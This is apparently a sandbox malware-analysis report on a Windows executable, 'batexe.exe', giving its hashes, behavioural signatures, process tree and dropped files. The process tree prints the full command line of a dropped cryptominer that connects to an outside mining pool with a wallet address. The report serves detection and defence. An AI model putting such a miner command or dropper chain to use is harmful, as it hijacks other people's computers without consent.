73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
308s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
19/02/2024, 19:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2164	b2e.exe
4568	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4568	cpuminer-sse2.exe
4568	cpuminer-sse2.exe
4568	cpuminer-sse2.exe
4568	cpuminer-sse2.exe
4568	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2440-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 2164	2440	batexe.exe	73
PID 2440 wrote to memory of 2164	2440	batexe.exe	73
PID 2440 wrote to memory of 2164	2440	batexe.exe	73
PID 2164 wrote to memory of 4436	2164	b2e.exe	74
PID 2164 wrote to memory of 4436	2164	b2e.exe	74
PID 2164 wrote to memory of 4436	2164	b2e.exe	74
PID 4436 wrote to memory of 4568	4436	cmd.exe	77
PID 4436 wrote to memory of 4568	4436	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Users\Admin\AppData\Local\Temp\AB72.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\AB72.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\AB72.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B026.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AB72.tmp\b2e.exe

Filesize
2.5MB

MD5
87911ad54622f51ab0faa16dfe5a0e44

SHA1
5f9b533c10849c914569eaa6e7ea0911b446ed5a

SHA256
cd35ad55bc1a31977b81850b236713800f1ae200640784940b9f9bb59513216d

SHA512
2c6bfcc11116381306d84bc5910dff1fb6755dba9e30da79e218ba57d65384a24867752d2ff4e9ddd1aa605fa4b5e538c783d2a445fbcce7eea379978b4eacb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\AB72.tmp\b2e.exe

Filesize
3.9MB

MD5
0e174c917ac04f1324909128dcea39f4

SHA1
c8e2095c05aca81005da419ac804b479e6f00eef

SHA256
471671c7eb6697c7948fd841395f5dc55df43ad790e96f4e255c05d5dcc2a452

SHA512
b0608dfb7e2e2e844f41a7c6fea20ad8a1df9fa20e6fd4342a0929a737553ccade3c62c1d60aa9ea7b63f4c25b53d7b732df9120daa856e645bec6c0707f22f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\B026.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
380KB

MD5
f5b34934fd226e7405e692c6b96f5918

SHA1
25ae90485aa1abf0f3926e5f9e69275ea7017b63

SHA256
5bf5384b0db52d87dfdde0c3ef45db46c05326469b2d5ff48ce4b18201a946e5

SHA512
817a725095d68e9e4f07c05232d9c2a0c4916993f8ab52fefc57d85f73b7310daac3edbb3e893b3334e3f189213134df287872aab1aaea2a5428562824395c3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
359KB

MD5
dfbee90b1d300f8429f8bf2ecda37e40

SHA1
a9372dc9e6f54045ce680ee1d0b01824feedcb3e

SHA256
d25b6288dace7e87e6f8f248f005f80f8e436be01ee9e2791cbaf8926bfcf0c2

SHA512
d4803b29eff9551f02c2782f59fc26a9c6794401db320e3162b08515f8b3ad838b76c4fc42d8171d69a9e5b714c373d97db07e06eef33aceacd6561ade9d07c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
387KB

MD5
63a6340fb781179423af30491e8786ad

SHA1
37bf8a2e4532cd254117f1b882212bd998d29c56

SHA256
203f173bb7d0e54946a3fbd69b8078861f948497560044d2443c54e6ee1d6341

SHA512
385fb90baad45556abe643ce590ef963034687cd7d0b54994b50f72cf62e5944b0ac8e6bd34a2a706e94b7a2a7bc700eacd33eec5ab02dc242068002065f0eae

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
752KB

MD5
a1d85ff78d515ff084f7bcf5518117e5

SHA1
7e325d2ce84e49079958994fab02204e2cc4c85d

SHA256
3f566c1fd489a06813af3098eb6c42bfb8a396e235a787c0bb12d7ea33b07343

SHA512
a21d8ce9b41fec1b38ca1ad7d06ed16690c86f24705745df31511d68dff8c9ed77f86576f6ad65bcc25543604882378a0aa201249152f59b2794af9dbbdd7517

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
293KB

MD5
a28af491b94aa55bebb8253c6e769e4c

SHA1
79b322a40b7fbee5fd24a982c6067291c1b34ad6

SHA256
21a8c592fe3db0936d895405e60589c80edc85230fb83ca936af447a304a4232

SHA512
8538c8d450b82a683cc11a94ac1c14532d8f4e8821cfaa18d1b14689df4b02f85720afd3c88b215f77e797675135398d6dd68d9b500c896118fe44eac7fcbff8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
318KB

MD5
840a7a25079b490b9d8cfac5c8375e46

SHA1
1bf01c11bfdd1282c7eee77cb457b99684d3ae64

SHA256
ad31595813e5d296730d99a3b392e265940dfce9a6b42b66a5086fbfcd6c2232

SHA512
3ad303dd869ba1f5d8149e0966d939655acdabb5e82e47a037398bf5d09e8ea01a5f353cd83534812bd1eebc9267857a02e897799d16d90e451ae5ba65dbc8c1

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
299KB

MD5
24cbb624a86413869bec25db2519bb69

SHA1
f6cd9ba9c27eba4592303c9890cb940fd5944cbe

SHA256
3a96b26dada728b54560d24cfd075258fed95ba2c5089eeb5ebc4b65051faed7

SHA512
79030ab3aefdacaea84918a7881681811570a31d27ad3470ac87f8c70435110cb9776a7779376622379126cf8cfaaecb1d600abfca1297fb6c7e0825c322d868

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
377KB

MD5
d823f61e88b0d08f77430fb9a66b1733

SHA1
0940eee3104cfebbc0d9676722f659470ed80dbc

SHA256
4dd8f63f08043d23ddb22830c0b4fe902bf38d053218bc9615205b347d693da8

SHA512
59340608401fa1daa805f8d9acc710e6efb3d2017abbb4ba50348d6bb080d9e754c71b9f21cf995d9206643ceec67be1c7055e93ceab4ac0369f0a0d78857e20

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
301KB

MD5
1018208f395b476df1cf1f3efa4088cc

SHA1
df71931c1d16c4eeef077be390d6e2eac23b95bb

SHA256
2e0cc9253ee49c9b95cf3f3f35c190c6cd0be74070b232ab70d165c0a8dee43d

SHA512
a18c4c701f4a5c76d5f7abc762950782297ec6c8e7b1853c07b55b9349aa4a3a38e79c1b63b297a3b22e8b19f7fd38f41daaca7c0b2e5d5a6ef6b5419c330d59

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
250KB

MD5
a999d600d5f350c08fcd05c90fa70a6f

SHA1
f72307106ad02a00c7b2c7624d0735dd6462dd40

SHA256
e0610e0b643d5c269141b173fe9605d2d841579e012256d119ca2c5509fe61b3

SHA512
7fb23bc723476a027c0c1d0028d54b7c0cd99908a5fa5ec85a7d73a97fda674e932079e2f2854005680e20b1b389c2bab4e72ce7172b866e37d8c4bf7c43211e

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
248KB

MD5
aa652e4e9b22b6bbfebd7b54ce878e81

SHA1
9dce8c82ea9088631e3d75a42642d232376d4dfe

SHA256
3ddf61877821fc57ae5c264c01fe0acdfc955a25b6029d75e1a9b5bae817e849

SHA512
0405ee80a7e1d26a55a93a3d7455d749960835761f8f76a444a98245fb200aff3d2a790e21f245fef936c88bf5780c8e7d8643100d0a22fa62b6ba56039666cb

Download Submit
memory/2164-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2164-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2440-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4568-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-42-0x000000005BC40000-0x000000005BCD8000-memory.dmp

Filesize
608KB

Download
memory/4568-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4568-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4568-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4568-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4568-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download